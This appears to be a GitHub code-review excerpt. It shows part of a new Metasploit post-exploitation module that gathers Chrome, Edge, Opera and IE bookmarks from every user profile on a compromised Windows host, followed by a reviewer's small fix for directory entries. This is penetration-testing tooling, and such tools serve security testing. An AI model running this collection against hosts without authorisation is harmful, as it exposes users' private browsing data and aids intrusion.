modules/post/windows/gather/get_bookmarks.rb

```diff
@@ -0,0 +1,90 @@
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bookmarked Sites Retriever',
+        'Description' => %q{
+          This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'jerrelgordon'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [ ],
+          'SideEffects' => []
+        }
+      )
+ )
+  end
+
+  def run
+    get_bookmarks('GoogleChrome') # gets bookmarks for google chrome
+    get_bookmarks('Opera') # gets bookmarks for opera
+    get_bookmarks('Edge') # gets bookmarks for edge
+    get_bookmarks('IE') # gets bookmarks for internet explorer
+  end
+
+  def get_bookmarks(browser)
+    file_exists = false # initializes file as not found
+    grab_user_profiles.each do |user| # parses information for all users on target machine into a list.
+      # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
+      if (browser == 'GoogleChrome')
+        next unless user['LocalAppData']
+
+        bookmark_path = "#{user['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Bookmarks" # sets path for Google Chrome Bookmarks
+      elsif (browser == 'Edge')
+        next unless user['LocalAppData']
+
+        bookmark_path = "#{user['LocalAppData']}\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" # sets path for Microsoft Edge Bookmarks
+      elsif (browser == 'Opera')
+        next unless user['AppData']
+
+        bookmark_path = "#{user['AppData']}\\Opera Software\\Opera Stable\\Bookmarks" # sets path for Opera Bookmarks
+      elsif (browser == 'IE')
+        next unless user['Favorites']
+
+        bookmark_path = (user['Favorites']).to_s # sets path for IE Bookmarks Folder
+        count = 1
+        dir(bookmark_path).each do |file| # IE bookmarks stored individually as files so loots each one
+          file_exists = true
```

Comment:
```suggestion
          next if ['.', '..'].include?(file)
          file_exists = true
```

This will prevent the loop to try and open the `.` and `..` directories which we're not interested in.